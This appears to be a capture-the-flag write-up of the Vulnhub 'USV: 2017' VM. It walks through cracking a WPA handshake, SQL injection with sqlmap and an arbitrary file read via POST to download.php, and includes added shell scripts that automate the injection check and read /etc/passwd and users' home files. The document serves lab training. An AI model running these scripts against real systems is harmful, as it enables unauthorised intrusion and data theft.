Vulnhub: USV 2017 Boot2Root VM

Introduction

Today we’re going to be taking a look at the “USV: 2017” VM from Vulnhub! This was a super fun CTF, consisting of five flags, each in the format country:MD5 hash.

This CTF had a bit of everything and required some nice creative problem solving to complete!

Nmap

W00t, we got our first flag (France) in the SSL certificate details of the second Apache instance, the one listening on port 15020!

Dirb

Running Dirb on port 80 turns up an “admin2” directory, among others. We’ll check that out in a second as it looks interesting. Running Dirb on port 15020 turns up a “vault” directory and a blog, among other things.

Loads of treats here. Let’s have a look at the admin2 page on port 80 first.

Port 80

After navigating to the admin2 page on port 80 we’re presented with a simple login form with just a password field. We try the obvious things like “admin” and “password” but have no luck. Looking at the page source, it appears that when submit is clicked some obfuscated JavaScript runs.

That’s horrendous. After beautifying it and working out what it does (and removing the two red herrings), I wrote some code that runs the algorithm in reverse so it generates a valid key for us, which merrily spat out “77779673” as the answer.

Trying that as the password in the login form worked:

Italy:46202df2ae6c46db8efc0af148370a78

Yay! We got our second flag: that’s France and Italy now.

Onwards!

Port 15020

Navigating to the “vault” directory found in the Dirb output above yields an index file with three hundred links to directories named “door 1” to “door 300”. Inside each door are one hundred directories named “vault 1” to “vault 100”, so at this point I decided that I didn’t fancy navigating through 30,000 directories by hand! Let’s do some Bash-fu instead: pull them all down and look for obvious differences in response size 🙂
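The Bash-fu above, reconstructed as an added example (this is not the post’s own script). It generates the 30,000 door/vault URLs, fetches them in parallel, and then flags the responses whose size differs from the most common one. The base URL, the URL-encoded “door%20N/vault%20M/” naming and the idea that each vault directory serves an index page are assumptions, not facts from the post.

```sh
#!/bin/sh
# Added example, not from the original post: enumerate the 300 x 100 "door N/vault M"
# directories on the port-15020 web server and flag the ones whose response size differs
# from the rest. Base URL, URL encoding and "each vault serves an index page" are assumptions.

# Print one URL per vault directory: BASE/door%20N/vault%20M/ for N in 1..300, M in 1..100.
gen_urls() {
  base="$1"
  d=1
  while [ "$d" -le 300 ]; do
    v=1
    while [ "$v" -le 100 ]; do
      printf '%s/door%%20%d/vault%%20%d/\n' "$base" "$d" "$v"
      v=$((v + 1))
    done
    d=$((d + 1))
  done
}

# Fetch every URL (16 at a time, ignoring the self-signed certificate) and emit
# one "size url" line per response.
fetch_sizes() {
  gen_urls "$1" | xargs -P 16 -n 1 curl -sk -o /dev/null \
    -w '%{size_download} %{url_effective}\n'
}

# Read "size url" lines on stdin and print those whose size differs from the most
# common size: almost every directory looks the same, so the odd ones out are where
# the interesting files live.
find_outliers() {
  awk '
    { size[NR] = $1; url[NR] = $2; count[$1]++ }
    END {
      best = 0
      for (s in count) if (count[s] > best) { best = count[s]; mode = s }
      for (i = 1; i <= NR; i++) if (size[i] != mode) print size[i], url[i]
    }'
}

# Usage (needs network access; host, port and path are assumed):
#   fetch_sizes https://192.168.56.101:15020/vault | tee sizes.txt | find_outliers
```

Saving the raw “size url” list with tee means the slow part only runs once; find_outliers can be re-run with different heuristics without re-fetching anything.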
The odd ones out turn out to be two files: rockyou.zip, which just contains the famous password list of the same name, and ctf.cap, which is a pcap file.

Nothing interesting jumped out of the pcap apart from a WPA authentication handshake, so we use aircrack-ng with our handy dandy rockyou list to crack the passphrase, in case it yields additional treats.

30 minutes later the passphrase pops out.

But we don’t know what that key relates to just yet, so we’ll keep it aside for now and go take a look at the blog.

Blog

Nothing is immediately interesting on the blog itself. There’s an HTML comment in the source pointing to download.php, which I think can be leveraged to download arbitrary files, and one of the comments on the blog mentions “I keep a flag.txt in my house”, so I think the two will be relevant later!
There’s also an admin panel login. After prodding it a little I tried “admin” as the username and “minion.666” as the password and it let me in!
I was a bit flummoxed here, as the administrative controls don’t seem to work, but after looking at the page source I uncovered something useful.

Amazing. After some more URL tampering I spotted that if I mess with the ‘id’ parameter of ‘edit.php’ I can get the form either to display or not, depending on the value. A true/false difference in the page like that is the classic sign of a boolean-based SQL injection, so let’s chuck the URL into sqlmap and see what sticks.


sqlmap confirms that the id parameter is injectable. Now we can add some dump options to get the data out of the database and peruse it.


I’d normally use the same command as above with “-T users --dump” at this point to get all of the treats out of the database, but it wasn’t playing ball, so I went Googling to see what other options there were. It turns out sqlmap supports an “--sql-query” option that runs a custom query of your choosing.


That’s our fourth flag found! Notice that we run “select * from users where id=2”; this is because id=1 gave us back the admin user, whose credentials we already have.
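The two steps above (confirm the true/false behaviour of ‘id’ by hand, then hand the URL to sqlmap) as an added example; this is not the post’s own command line, and the blog path, host, session-cookie name and the choice of id=1 as the known-good value are assumptions. The post only tells us that changing ‘id’ makes the form appear or disappear and that “--sql-query” was needed where “-T users --dump” failed.

```sh
#!/bin/sh
# Added example, not from the original post: manually confirm the boolean behaviour of
# edit.php's "id" parameter, then let sqlmap enumerate and run a custom query.
# Host, path, cookie name and the known-good id value are assumptions.

# The admin area sits behind a login, so every request carries the session cookie.
# fetch() is a separate function so the check can be exercised offline by overriding it.
fetch() {
  curl -sk -b "${COOKIE:-PHPSESSID=replace-me}" "$1"
}

# Boolean-based check: append a true and a false condition to a known-good id and
# compare response sizes. A difference means the condition reached the SQL query.
# $1 is the URL up to and including "id=", e.g. https://host:15020/blog/admin/edit.php?id=
id_is_injectable() {
  base="$1"
  true_len=$(fetch "${base}1%20AND%201=1" | wc -c | tr -d ' ')
  false_len=$(fetch "${base}1%20AND%201=2" | wc -c | tr -d ' ')
  [ "$true_len" -ne "$false_len" ]
}

# Once confirmed, let sqlmap do the heavy lifting: --batch takes the defaults without
# prompting, -p restricts testing to "id", and --sql-query runs an arbitrary statement,
# the fallback the post reached for when "-T users --dump" would not cooperate.
sqlmap_users() {
  url="$1"
  cookie="${COOKIE:-PHPSESSID=replace-me}"
  sqlmap -u "${url}1" --cookie="$cookie" -p id --batch --dbs
  sqlmap -u "${url}1" --cookie="$cookie" -p id --batch \
    --sql-query "select * from users where id=2"
}

# Usage (needs network access and a logged-in session cookie):
#   export COOKIE='PHPSESSID=...'
#   U='https://192.168.56.101:15020/blog/admin/edit.php?id='
#   id_is_injectable "$U" && sqlmap_users "$U"
```

Comparing sizes rather than exact bodies keeps the check robust against timestamps or CSRF tokens that change on every page load; if the two lengths come back equal, the parameter is either not injectable at this position or the page does not reflect the query result, and sqlmap’s other techniques (time-based, error-based) are the next thing to try.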

Just one flag left to go!

So let’s go and prod download.php some more. It was returning an error saying that the “image” parameter was missing even when I supplied it in the query string, as in download.php?image=/etc/passwd, so presumably it only reads the parameter from the request body. Let’s try a POST request with curl instead.


Awesome, so we’ve got an arbitrary file read on the site (the post-style “LFI” bug). Let’s try and find that flag.txt which was alluded to earlier!

On the blog there was a banner image with three minions, “Kevin”, “Phil” and “Dave”, and the /etc/passwd output shows that ‘kevin’ is a valid user on the box, so let’s go and try his home directory.
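The flag hunt above, automated as an added example (not the post’s own commands): POST the file path to download.php, pull /etc/passwd, pick out the real login accounts rather than guessing from the banner, and try /home/<user>/flag.txt for each. The host, the download.php path and the fact that the parameter is called “image” in the POST body are assumptions; the post only shows that name in the error message.

```sh
#!/bin/sh
# Added example, not from the original post: drive the download.php file read over POST,
# extract interactive users from /etc/passwd and check each home directory for flag.txt.
# Host, path and the "image" body parameter are assumptions.

# POST image=<path> to download.php ($1) and print whatever the server returns.
read_file() {
  curl -sk -X POST --data-urlencode "image=$2" "$1"
}

# From /etc/passwd text on stdin, print the names of interactive accounts:
# uid >= 1000, a home directory under /home, and a shell that is not nologin/false.
login_users() {
  awk -F: '$3 >= 1000 && $6 ~ /^\/home\// && $7 !~ /(nologin|false)$/ { print $1 }'
}

# Try /home/<user>/flag.txt for every login user and print any non-empty response.
hunt_flag() {
  url="$1"
  read_file "$url" /etc/passwd | login_users | while read -r u; do
    body=$(read_file "$url" "/home/$u/flag.txt")
    if [ -n "$body" ]; then
      printf '%s: %s\n' "$u" "$body"
    fi
  done
}

# Usage (needs network access):
#   hunt_flag https://192.168.56.101:15020/blog/download.php
```

Filtering on uid, home directory and shell avoids wasting requests on system accounts; on this box it should reduce /etc/passwd to just the minion users, which is exactly the shortlist the banner image suggested.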


Bingo, got our 5th and final flag!


Conclusion

Really, really fun challenge. Creative and challenging but without being too obscure or so overly difficult that it’s impossible for yours truly to do the challenge alone.
Many thanks to the authors and Vulnhub 🙂
